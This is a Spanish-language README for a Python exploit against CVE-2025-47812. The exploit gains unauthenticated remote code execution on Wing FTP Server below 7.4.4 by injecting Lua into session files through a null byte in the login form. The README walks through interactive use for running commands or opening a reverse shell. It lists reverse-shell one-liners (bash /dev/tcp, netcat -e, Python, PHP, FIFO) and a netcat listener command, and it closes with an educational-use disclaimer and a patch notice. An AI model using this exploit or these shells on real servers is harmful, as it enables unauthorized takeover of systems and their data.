
Explotación de ejecución remota de código no autenticada para Wing FTP Server < 7.4.4, que permite la ejecución de comandos y shells inversas mediante inyección de Lua en archivos de sesión.
CVE-2025-47812 - Ejecución Remota de Código (RCE) en Wing FTP Server
===========================================================
Autor: blindma1den
Fecha: Julio 2025
Tipo de Exploit: Ejecución Remota de Código (No autenticado)
Objetivo: Wing FTP Server < 7.4.4
Puntuación CVSS: 10.0 (Crítico)
Este script explota CVE-2025-47812, una vulnerabilidad crítica en la interfaz web de Wing FTP Server que permite a atacantes remotos ejecutar comandos arbitrarios del sistema o abrir una shell inversa sin autenticación.
La falla es causada por un manejo incorrecto de bytes nulos (%00)
en el formulario de inicio de sesión (/loginok.html). Esto permite
la inyección de código Lua en archivos de sesión, que luego se evalúan
cuando se accede a endpoints como /dir.html.
NVD Description: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
whoami, uname -a)Instalar dependencias:
pip install requests
Ejecuta el script:
python3 wingftp_rce_exploit.py
Se te solicitará:
[1] EJECUTAR COMANDO:
URL objetivo: http://192.168.1.10:5466
Nombre de usuario: anonymous
Tu elección (1 o 2): 1
Comando a ejecutar (por defecto: whoami): whoami
[2] SHELL INVERSA:
URL objetivo: http://192.168.1.10:5466
Nombre de usuario: anonymous
Tu elección (1 o 2): 2
Dirección IP de la shell inversa: 192.168.1.100
Puerto de la shell inversa: 4444
Inicia tu listener antes de disparar la shell:
nc -lvnp 4444
Bash: bash -i >& /dev/tcp/IP/PORT 0>&1
Python3: python3 -c 'import socket,subprocess,os; ...'
Netcat: nc IP PORT -e /bin/sh
PHP: php -r '$sock=fsockopen("IP",PORT); ...'
FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...
Este código es solo con fines educativos. NO utilices este exploit contra sistemas que no poseas o para los que no tengas autorización explícita para probar. El uso no autorizado es ilegal y poco ético.
Parchea tus sistemas de inmediato. Wing FTP Server 7.4.4 resuelve esta vulnerabilidad.
¡Feliz hacking!